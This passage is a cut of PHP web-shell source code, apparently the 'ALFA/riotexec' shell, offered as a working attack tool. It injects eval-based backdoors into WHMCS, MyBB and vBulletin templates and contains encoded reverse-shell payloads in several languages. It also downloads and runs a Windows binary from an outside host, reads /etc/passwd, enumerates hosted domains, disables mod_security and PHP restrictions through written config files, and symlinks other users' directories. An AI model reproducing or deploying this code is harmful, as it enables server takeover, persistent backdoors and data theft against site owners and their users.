"setting WHERE `varname`='bburl'"); $getval = @mysqli_fetch_assoc($geturl); $saveval = $getval["value"]; if ($faq_name == "header") { if (substr($saveval, -5, 5) == "/core") { $saveval = substr($saveval, 0, -5); } } $realurl = parse_url($saveval, PHP_URL_HOST); $realpath = parse_url($saveval, PHP_URL_PATH); $res = false; $AlfaCurl = new AlfaCURL(); if (extension_loaded("sockets") && function_exists("fsockopen") && $method == "auto") { if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) { @fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\r\n"); @fputs($fsock, "HOST: $realurl\r\n"); @fputs($fsock, "Connection: close\r\n\r\n"); $check = fgets($fsock); if (preg_match("/200 OK/i", $check)) { $p1 = "UPDATE " . $_POST["riot6"] . "template SET template ='" . mysqli_real_escape_string($conn, $savetoass) . "' WHERE title ='" . $faq_name . "'"; ($ka1 = @mysqli_query($conn, $p1)) or die(mysqli_error($conn)); $res = true; } @fclose($fsock); } } elseif (function_exists("curl_version") && $method == "auto") { $AlfaCurl->Send($realurl . $realpath . $faq_file); $p1 = "UPDATE " . $_POST["riot6"] . "template SET template ='" . mysqli_real_escape_string($conn, $savetoass) . "' WHERE title ='" . $faq_name . "'"; ($ka1 = @mysqli_query($conn, $p1)) or die(mysqli_error($conn)); $res = true; } if ($res) { $ff = "http://" . $realurl . $realpath . "/riotexec.php"; output($ff); } else { $ff = "http://" . $realurl . $realpath . $faq_file; $fff = "http://" . $realurl . $realpath . "/riotexec.php"; echo " | Cms Shell Injector |'; $selector = ' | WHMCS | | MyBB | | vBulletin |
Shell Inject Method :'; if (isset($_POST["riot1"]) && $_POST["riot1"] == "whmcs") { AlfaNum(); echo __pre() . "| WHMCS |"; if (isset($_POST["riot6"])) { $dbu = $_POST["riot6"]; $dbn = $_POST["riot7"]; $dbp = $_POST["riot8"]; $dbh = $_POST["riot9"]; $path = $_POST["riot10"]; $method = $_POST["riot4"]; $index = "{php}" . ALFA_UPLOADER . ";{/php}"; $newin = str_replace("'", "\'", $index); $newindex = " " . getConfigHtml("whmcs") . "
Dear $newin,
Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.
To reset your password, please visit the url below:
{\$pw_reset_url}When you visit the link above, your password will be reset, and the new password will be emailed to you.
{\$signature}
{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}"; if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) { if (filter_var($path, FILTER_VALIDATE_URL)) { ($conn = mysqli_connect($dbh, $dbu, $dbp, $dbn)) or die(mysqli_connect_error()); $soleSave = mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'"); $soleGet = mysqli_fetch_assoc($soleSave); $tempSave1 = $soleGet["message"]; $tempSave = str_replace("'", "\'", $tempSave1); mysqli_query($conn, "UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die(mysqli_error($conn)); $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'"; ($result = mysqli_query($conn, $inject)) or die(mysqli_error($conn)); $create = "insert into tblclients (email) values('riotexec@fbi.gov')"; ($result2 = mysqli_query($conn, $create)) or die(mysqli_error($conn)); if (function_exists("curl_version") && $method == "auto") { $AlfaSole = new AlfaCURL(true); $saveurl = $AlfaSole->Send($path . "/pwreset.php"); $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i", $saveurl, $token); $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&email=riotexec@fbi.gov"); $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'"; ($Solevisible = mysqli_query($conn, $backdata)) or die(mysqli_error($conn)); __alert("shell injectet..."); $ff = "http://" . $path . "/riotexec.php"; output($ff); } else { echo "Please go to Target => " . $path . "/pwreset.php
And Reset Password With Email => riotexec@fbi.gov
And Go To => " . $path . "/riotexec.php
"; } } else { __alert("Path is not Valid..."); } } } } if (isset($_POST["riot2"]) && $_POST["riot2"] == "mybb") { AlfaNum(1, 2, 3, 5); echo __pre() . "| MyBB |"; if (isset($_POST["riot6"])) { $dbu = $_POST["riot6"]; $dbn = $_POST["riot7"]; $dbp = $_POST["riot8"]; $dbh = $_POST["riot9"]; $prefix = $_POST["riot10"]; $method = $_POST["riot4"]; $shellCode = "{\${" . ALFA_UPLOADER . "}}"; $newinshell = str_replace("'", "\'", $shellCode); if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)) { ($conn = mysqli_connect($dbh, $dbu, $dbp, $dbn)) or die(mysqli_error($conn)); $inject = "select template from {$prefix}templates where title= 'calendar'"; ($result = mysqli_query($conn, $inject)) or die(mysqli_error($conn)); $GetTemp = mysqli_fetch_assoc($result); $saveDate = $GetTemp["template"]; $repsave = str_replace($shellCode, "", $saveDate); $repsave = str_replace("'", "\'", $repsave); $createShell = "update {$prefix}templates SET template= '" . $newinshell . $repsave . "' where title = 'calendar'"; ($result2 = mysqli_query($conn, $createShell)) or die(mysqli_error($conn)); $geturl = "select value from {$prefix}settings where name= 'bburl'"; ($findurl = mysqli_query($conn, $geturl)) or die(mysqli_error($conn)); $rowb = mysqli_fetch_assoc($findurl); $furl = $rowb["value"]; $realurl = parse_url($furl, PHP_URL_HOST); $realpath = parse_url($furl, PHP_URL_PATH); $res = false; $AlfaCurl = new AlfaCURL(); if (extension_loaded("sockets") && function_exists("fsockopen") && $method == "auto") { if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) { @fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n"); @fputs($fsock, "HOST: $realurl\r\n"); @fputs($fsock, "Connection: close\r\n\r\n"); $check = fgets($fsock); if (preg_match("/200 OK/i", $check)) { $repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'"; ($clear = mysqli_query($conn, $repairdbtemp)) or die(mysqli_error($conn)); $res = true; } @fclose($fsock); } } elseif 
(function_exists("curl_version") && $method == "auto") { $AlfaCurl->Send($realurl . $realpath . "/calendar.php"); $res = true; } if ($res) { $ff = "http://" . $realurl . $realpath . "/riotexec.php"; output($ff); } else { $ff = "http://" . $realurl . $realpath . "/calendar.php"; $fff = "http://" . $realurl . $realpath . "/riotexec.php"; echo " " . getConfigHtml("mybb") . " Please Go To Target => " . $ff . "
And Go To => " . $fff . "
"; } } } } if (isset($_POST["riot3"]) && $_POST["riot3"] == "vb") { AlfaNum(1, 2, 7, 9, 10); echo __pre() . '| vbulletin |' . getConfigHtml("vb") . '
"; } } } echo " First Open This Link => " . $ff . "
Second Open This Link => " . $fff . "" . __pre() . $s . " "; } function create_table($data) { echo '
" .
$array["tdName"] .
" |
'; echo htmlspecialchars(__read_file($_POST["riot1"])); echo "
' . $h[0] . " | " . $h[1] . " | " . htmlspecialchars($h[2]) . " |
'; } function riotproc() { riothead(); echo ""; riotfooter(); } function riotsafe() { riothead(); echo ""; if (empty($_POST["ajax"]) && !empty($_POST["riot1"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = false; } if ($GLOBALS["sys"] == "win") { $process = [ "Task List" => "tasklist /V", "System Info" => "systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all", ]; } else { $process = [ "Process status" => "ps aux", "Syslog" => "cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" => "cat /etc/hosts", "Cpuinfo" => "cat /proc/cpuinfo", "Version" => "cat /proc/version", "Sbin" => "ls -al /usr/sbin", "Interrupts" => "cat /proc/interrupts", "lsattr" => "lsattr -va", "Uptime" => "uptime", "Fstab" => "cat /etc/fstab", ]; } foreach ($process as $n => $link) { echo ' | ' . $n . " | "; } echo "
"; if (!empty($_POST["riot1"])) { echo ""; if ($GLOBALS["glob_chdir_false"] && !empty($_POST["c"])) { $cmd = "cd '" . addslashes($_POST["c"]) . "';"; } echo riotEx($cmd . $_POST["riot1"], true); echo ""; } echo "'; if (!empty($_POST["riot8"]) && isset($_POST["riot8"]) == "domains") { if (!_riot_file_exists("/etc/virtual/domainowners")) { echo __pre(); $riotexec9 = _riot_file("/etc/named.conf"); if (is_array($riotexec9)) { foreach ($riotexec9 as $riotexec13) { if (@eregi("zone", $riotexec13)) { preg_match_all('#zone "(.*)"#', $riotexec13, $riotexec14); if (strlen(trim($riotexec14[1][0])) > 2) { echo $riotexec14[1][0] . " | Auto ByPasser |"; echo '| PHP.INI | | .htaccess(apache) | | .htaccess(LiteSpeed) || Read-Passwd | | Read-Users | | Get-User | | Get-Domains |
"; } } } } } else { echo __pre(); $users = _riot_file("/etc/virtual/domainowners"); if (is_array($users)) { foreach ($users as $boz) { $dom = explode(":", $boz); echo $dom[0] . "\n"; } } } } if (!empty($_POST["riot6"]) && isset($_POST["riot6"]) == "valiases") { echo ' Url: '; if (isset($_POST["riot9"]) && $_POST["riot9"] == ">>") { if (!_riot_file_exists("/etc/virtual/domainowners")) { $site = trim($_POST["riot7"]); $rep = str_replace(["https://", "http://", "www."], "", $site); $user = ""; if (function_exists("posix_getpwuid") && function_exists("fileowner")) { if ($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))) { $user = $user["name"]; } } else { if (_riot_can_runCommand(true, true)) { $user = riotEx("stat -c '%U' /etc/valiases/" . $rep); } } if (!empty($user) && $user != "root") { echo __pre() . ""; riotfooter(); } function __get_resource($content) { return @gzinflate(__ZGVjb2Rlcg($content)); } function __write_file($file, $content) { if ($fh = @fopen($file, "wb")) { if (fwrite($fh, $content) !== false) { return true; } } return false; } function bcinit($evalType, $evalCode, $evalOptions, $evalArguments) { $res = "[ Success...! ]"; $err = "[ Failed...! ]"; if ($evalOptions != "") { $evalOptions = $evalOptions . " "; } if ($evalArguments != "") { $evalArguments = " " . $evalArguments; } if ($evalType == "c") { $tmpdir = ALFA_TEMPDIR; chdir($tmpdir); if (is_writable($tmpdir)) { $uniq = substr(md5(time()), 0, 8); $filename = $evalType . $uniq . ".c"; $path = $filename; if (__write_file($path, $evalCode)) { $ext = $GLOBALS["sys"] == "win" ? ".exe" : ".out"; $pathres = $filename . $ext; $evalOptions = "-o " . $pathres . " " . $evalOptions; $cmd = "gcc " . $evalOptions . $path; riotEx($cmd); if (is_file($pathres)) { if (chmod($pathres, 0755)) { $cmd = $pathres . 
$evalArguments; riotEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } unlink($path); } else { $res = $err; } } return $res; } elseif ($evalType == "java") { $tmpdir = ALFA_TEMPDIR; chdir($tmpdir); if (is_writable($tmpdir)) { if (preg_match("/class\ ([^{]+){/i", $evalCode, $r)) { $classname = trim($r[1]); $filename = $classname; } else { $uniq = substr(md5(time()), 0, 8); $filename = $evalType . $uniq; $evalCode = "class " . $filename . " { " . $evalCode . " } "; } $path = $filename . ".java"; if (__write_file($path, $evalCode)) { $cmd = "javac " . $evalOptions . $path; riotEx($cmd); $pathres = $filename . ".class"; if (is_file($pathres)) { if (chmod($pathres, 0755)) { $cmd = "java " . $filename . $evalArguments; riotEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } unlink($path); } else { $res = $err; } } return $res; } return false; } function riotconnect() { riothead(); $php = "7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5
+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU="; $python = "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"; $perl = "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"; $ruby = "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"; $node = "nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw=="; $c = "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"; $java = "lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D"; echo ""; } else { echo __pre() . "
User: {$user} site: {$rep} No such file or directory Or Disable Functions is not NONE... "; } } else { $site = trim($_POST["riot7"]); $rep = str_replace(["https://", "http://", "www."], "", $site); $users = _riot_file("/etc/virtual/domainowners"); foreach ($users as $boz) { $ex = explode(":", $boz); if ($ex[0] == $rep) { echo __pre() . ""; break; } } } } } if (!empty($_POST["riot5"]) && isset($_POST["riot5"])) { if (!_riot_file_exists("/etc/virtual/domainowners")) { echo __pre(); $i = 0; while ($i < 60000) { $line = @posix_getpwuid($i); if (!empty($line)) { while (list($key, $vl) = each($line)) { echo $vl . "\n"; break; } } $i++; } } else { echo __pre(); $users = _riot_file("/etc/virtual/domainowners"); foreach ($users as $boz) { $user = explode(":", $boz); echo trim($user[1]) . "
User: " . trim($ex[1]) . " site: {$rep}
"; } } } if (!empty($_POST["riot4"]) && isset($_POST["riot4"])) { echo __pre(); if (_riot_can_runCommand(true, true)) { echo __read_file("/etc/passwd"); } elseif (function_exists("posix_getpwuid")) { for ($uid = 0; $uid < 60000; $uid++) { $ara = @posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { echo "$val:"; } echo "\n"; } } } else { __alert("failed..."); } } if (!empty($_POST["riot2"]) && isset($_POST["riot2"])) { @__write_file($GLOBALS["cwd"] . ".htaccess", "#Generated By Sole Sad and Invisible\n\nSec------Engine Off\nSec------ScanPOST Off\n "); echo "htaccess for Apache created...! "; } if (!empty($_POST["riot1"]) && isset($_POST["riot1"])) { @__write_file($GLOBALS["cwd"] . "php.ini", "safe_mode=OFF\ndisable_functions=ByPassed By IDM(ALFA TEaM)"); echo "php.ini created...! "; } if (!empty($_POST["riot3"]) && isset($_POST["riot3"])) { @__write_file($GLOBALS["cwd"] . ".htaccess", "#Generated By Sole Sad and Invisible\n\nForceType application/x-httpd-php4\n \n\nSecFilterEngine Off\nSecFilterScanPOST Off\n "); echo "htaccess for Litespeed created...! "; } echo ""; riotfooter(); } function riotMakePwd() { if (_riot_file_exists("/etc/virtual/domainowners") || (_riot_file_exists("/etc/named.conf") && _riot_file_exists("/etc/valiases"))) { return "/home/{user}/public_html/"; } $document = explode("/", $_SERVER["DOCUMENT_ROOT"]); $public = end($document); array_pop($document); array_pop($document); $path = implode("/", $document) . "/{user}/" . $public; return $path; } function riotGetDomains($state = false) { $state = "named.conf"; $lines = []; $lines = _riot_file("/etc/named.conf"); if (!$lines) { $lines = @scandir("/etc/valiases/"); $state = "valiases"; if (!$lines) { $lines = @scandir("/var/named"); $state = "named"; if (!$lines && $state) { $lines = _riot_file("/etc/passwd"); $state = "passwd"; } } } return ["lines" => $lines, "state" => $state]; } function riotCreateParentFolder() { $parent = $GLOBALS["home_cwd"] . "/" . 
__SYS_CONFIG_FOLDER__; if (!@is_dir($parent)) { @mkdir($parent, 0755, true); } } function riotsymlink() { riothead(); AlfaNum(9, 10); riotCreateParentFolder(); @chdir($GLOBALS["home_cwd"] . "/" . __SYS_CONFIG_FOLDER__); echo ' | Back Connect |
"; echo "Run ` nc -l -v -p port ` on your computer and press ` >> ` button
"; if (isset($_POST["riot1"]) && !empty($_POST["riot1"])) { $lang = $_POST["riot1"]; $ip = $_POST["riot2"]; $port = $_POST["riot3"]; $arg = $_POST["riot4"] == "bind" ? $port : $port . " " . $ip; $tmpdir = ALFA_TEMPDIR; $name = $tmpdir . "/" . $lang . uniqid() . rand(1, 99999); $allow = ["perl", "ruby", "python", "node"]; eval('$lan=$' . $lang . ";"); if (in_array($lang, $allow)) { if (__write_file($name, __get_resource($lan))) { if (_riot_can_runCommand(true, true)) { $os = $GLOBALS["sys"] != "win" ? "1>/dev/null 2>&1 &" : ""; $out = riotEx("$lang $name $arg $os"); if ($out == "") { $out = "[ Finished...! ] "; } echo "{$out}"; } } else { echo ""; } } if ($lang == "java" || $lang == "c") { $code = __get_resource($lan); $out = nl2br(bcinit($lang, $code, "", "")); echo "[ Failed...! ] "; } if ($lang == "bcwin") { $riot = new AlfaCURL(); $s = $riot->Send("http://riotexec.com/bc/windows.exe"); $tmpdir = ALFA_TEMPDIR; $f = @fopen($tmpdir . "/bcwin.exe", "w+"); @fwrite($f, $s); @fclose($f); $out = riotEx($tmpdir . "/bcwin.exe " . $_POST["riot2"] . " " . $_POST["riot3"]); } if ($lang == "php") { echo "{$out} "; $code = __get_resource($lan); if ($code !== false) { $code = "\$target = \"" . $arg . "\";\n" . $code; eval($code); echo ""; } } echo "[ Finished...! 
] "; } echo ""; riotfooter(); } function riotsql() { class DbClass { public $type; public $link; public $res; public $mysqli_connect_error = false; public $mysqli_connect_error_msg = ""; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) { return true; } else { $this->mysqli_connect_error = true; $this->mysqli_connect_error_msg = mysqli_connect_error(); return false; } break; case "pgsql": $host = explode(":", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysqli_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysqli_query($this->link, $str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? 
func_get_arg(0) : $this->res; switch ($this->type) { case "mysql": return @mysqli_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysqli_error($this->link); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql_set_charset")) { return @mysqli_set_charset($this->link, $str); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": $this->query("CREATE TABLE riotexec(file text);COPY riotexec FROM '" . addslashes($str) . 
"';select file from riotexec;"); $r = []; while ($i = $this->fetch()) { $r[] = $i["file"]; } $this->query("drop table riotexec"); return ["file" => implode("\n", $r)]; break; } return false; } } $db = new DbClass($_POST["type"]); riothead(); $form_visibility = "table"; if (isset($_POST["sql_host"])) { $connection_db = $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); if ($connection_db && !empty($_POST["sql_base"])) { $form_visibility = "none"; } } $database_list = []; echo ""; $cant_symlink = false; } if ($cant_symlink) { echo ' | Symlink |'; if (isset($_POST["riot2"]) && ($_POST["riot2"] == "symperl" || $_POST["riot2"] == "sympy")) { $sympath = riotMakePwd(); @mkdir("cgiriot", 0755); @chdir("cgiriot"); riotcgihtaccess("cgi"); $perl = "#!/usr/bin/perl -I/usr/local/bandmin" . "\n" . 'use MIME::Base64;use Compress::Zlib;my $riot_data="' . __SYS_CONFIG_FOLDER__ . '";eval(Compress::Zlib::memGunzip(decode_base64("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")));'; $py = "#!/usr/bin/python" . "\nimport zlib, base64\nriot_data='" . __SYS_CONFIG_FOLDER__ . "'\n" . 'eval(compile(zlib.decompress(base64.b64decode("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")),\' | Symlink( php ) | | Symlink( perl ) | | Symlink( python ) | | File Symlink |
\',\'exec\'))'; $cginame = "symperl.riot"; $source = $perl; $lang = "perl"; if ($_POST["riot2"] == "sympy") { $cginame = "pysymlink.riot"; $source = $py; $lang = "python"; } @__write_file($cginame, $source); @chmod($cginame, 0755); echo __pre(); $resource = riotEx("{$lang} {$cginame} {$sympath}", false, true, true); if (strlen($resource) == 0) { echo AlfaiFrameCreator("cgiriot/" . $cginame); } else { echo $resource; } } if (isset($_POST["riot4"]) && $_POST["riot4"] == "SymFile") { if (function_exists("symlink") || _riot_can_runCommand(true, true)) { AlfaNum(9, 10); echo __pre() . ' '; $path = $_POST["riot5"]; $symname = $_POST["riot6"]; $riotexec58 = $_POST["riot7"]; if ($riotexec58) { $new_name = str_replace(".", "_", basename($symname)); $rand_dir = $new_name . rand(111, 9999); $sym_dir = "riotsymlinkphp/" . $rand_dir . "/"; @mkdir($sym_dir, 0777, true); riotcgihtaccess("sym", $sym_dir, $symname); _riot_symlink("$path", "$sym_dir/$symname"); echo __pre(); echo ' | Symlink File And Directory |Click >> ' . $symname . " "; } } else { echo ""; } } if (isset($_POST["riot2"]) && $_POST["riot2"] == "symphp") { $cant_symlink = true; if (function_exists("symlink") || _riot_can_runCommand(false, false)) { @mkdir("riotsymlink", 0777); riotcgihtaccess("sym", "riotsymlink/"); _riot_symlink("/", "riotsymlink/root"); $table_header = " [+] Symlink Function Disabled !"; $cant_symlink = false; } } else { echo "
* Domains Users symlink "; if (_riot_file_exists("/etc/named.conf") && !_riot_file_exists("/etc/virtual/domainowners") && _riot_file_exists("/etc/valiases/")) { echo ""; $lines = []; $anony_domains = []; $anonymous_users = []; $f_black = []; $error = false; $anonymous = false; $makepwd = "/home/{user}/public_html/"; $domains = riotGetDomains(); $lines = $domains["lines"]; $state = $domains["state"]; $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner"); $can_runcmd = _riot_can_runCommand(false, false); if (!$is_posix && !$can_runcmd) { $anonymous = true; $anony_domains = $domains["lines"]; $lines = _riot_file("/etc/passwd"); } echo $table_header; $count = 1; $template = ' '; foreach ($lines as $line) { $domain = ""; $owner = ""; if ($anonymous) { $explode = explode(":", $line); $owner = $explode[0]; $owner_len = strlen($owner) - 1; $userid = $explode[2]; if ((int) $userid < 500) { continue; } $domain = "[?????]"; $temp_black = []; $finded = false; foreach ($anony_domains as $anony) { if ($state == "named.conf") { if (@strstr($anony, "zone")) { preg_match_all('#zone "(.*)"#', $anony, $data); $domain = $data[1][0]; } else { continue; } } elseif ($state == "named" || $state == "valiases") { if ($anony == "." || $anony == "..") { continue; } if ($state == "named") { $anony = rtrim($anony, ".db"); } $domain = $anony; } $sub_domain = str_replace(["-", "."], "", $domain); if (substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)) { if (in_array($owner . $domain, $temp_black)) { continue; } $sympath = str_replace("{user}", $owner, $makepwd); $http = "http://" . $domain; echo str_replace(["{count}", "{http}", "{domain}", "{owner}", "{sympath}"], [$count, $http, $domain, $owner, $sympath], $template); $count++; $temp_black[] = $owner . 
$domain; $finded = true; } } if (!$finded) { $anonymous_users[] = $owner; } } else { if ($state == "named.conf") { if (@strstr($line, "zone")) { preg_match_all('#zone "(.*)"#', $line, $data); $domain = $data[1][0]; } else { continue; } } elseif ($state == "named" || $state == "valiases") { if ($line == "." || $line == "..") { continue; } if ($state == "named") { $line = rtrim($line, ".db"); } $domain = $line; } if (strlen(trim($domain)) > 2 && $state != "passwd") { if (!_riot_file_exists("/etc/valiases/" . $domain, false)) { continue; } if ($is_posix) { $user = @posix_getpwuid(@fileowner("/etc/valiases/" . $domain)); $owner = $user["name"]; } elseif ($can_runcmd) { $owner = riotEx("stat -c '%U' /etc/valiases/" . $domain, false, false); } } } if (!$anonymous) { if (strlen($owner) == 0 || in_array($owner . $domain, $f_black)) { continue; } $sympath = str_replace("{user}", $owner, $makepwd); $http = "http://" . $domain; if ($state == "passwd") { $http = "javascript:alert('we cant find domain...')"; } echo str_replace(["{count}", "{http}", "{domain}", "{owner}", "{sympath}"], [$count, $http, $domain, $owner, $sympath], $template); $count++; $f_black[] = $owner . 
$domain; } } if ($anonymous) { foreach ($anonymous_users as $owner) { $sympath = str_replace("{user}", $owner, $makepwd); $http = "javascript:alert('we cant find domain...')"; echo str_replace(["{count}", "{http}", "{domain}", "{owner}", "{sympath}"], [$count, $http, "[????]", $owner, $sympath], $template); $count++; } } $cant_symlink = false; } else { $is_direct = false; $makepwd = riotMakePwd(); if (_riot_file_exists("/etc/virtual/domainowners")) { $makepwd = "/home/{user}/public_html"; $is_direct = true; } $sole = _riot_file("/etc/virtual/domainowners"); $count = 1; echo $table_header; $template = ' {count} {domain} {owner} Symlink '; if ($sole) { foreach ($sole as $visible) { if (@strstr($visible, ":")) { $riotexec = explode(":", $visible); $cwd = str_replace("{user}", trim($riotexec[1]), $makepwd); echo str_replace(["{count}", "{user}", "{url}", "{cwd}"], [$count++, trim($riotexec[1]), trim($riotexec[0]), $cwd], $template); } } } else { $passwd = _riot_file("/etc/passwd"); if ($passwd) { $html = ""; $is_named = false; $users = []; $domains = []; $uknowns = []; foreach ($passwd as $user) { $user = trim($user); $expl = explode(":", $user); if ((int) $expl[2] < 500) { continue; } $users[$expl[0]] = $expl[5]; } $site_domains = @scandir("/etc/virtual/"); if (!$site_domains) { $site_domains = riotEx("ls /etc/virtual/"); $site_domains = explode("\n", $site_domains); if (!$site_domains) { $site_domains = _riot_file("/etc/named.conf"); if ($site_domains) { $is_named = true; } } } foreach ($site_domains as $line) { if ($is_named) { if (@strstr($line, "zone")) { preg_match_all('#zone "(.*)"#', $line, $data); $domain = $data[1][0]; if (strlen($domain > 2) && !empty($domain)) { $domains[] = $domain; } } } else { $domains[] = $line; } } $x = 1; foreach ($users as $user => $home) { foreach ($domains as $domain) { $user_len = 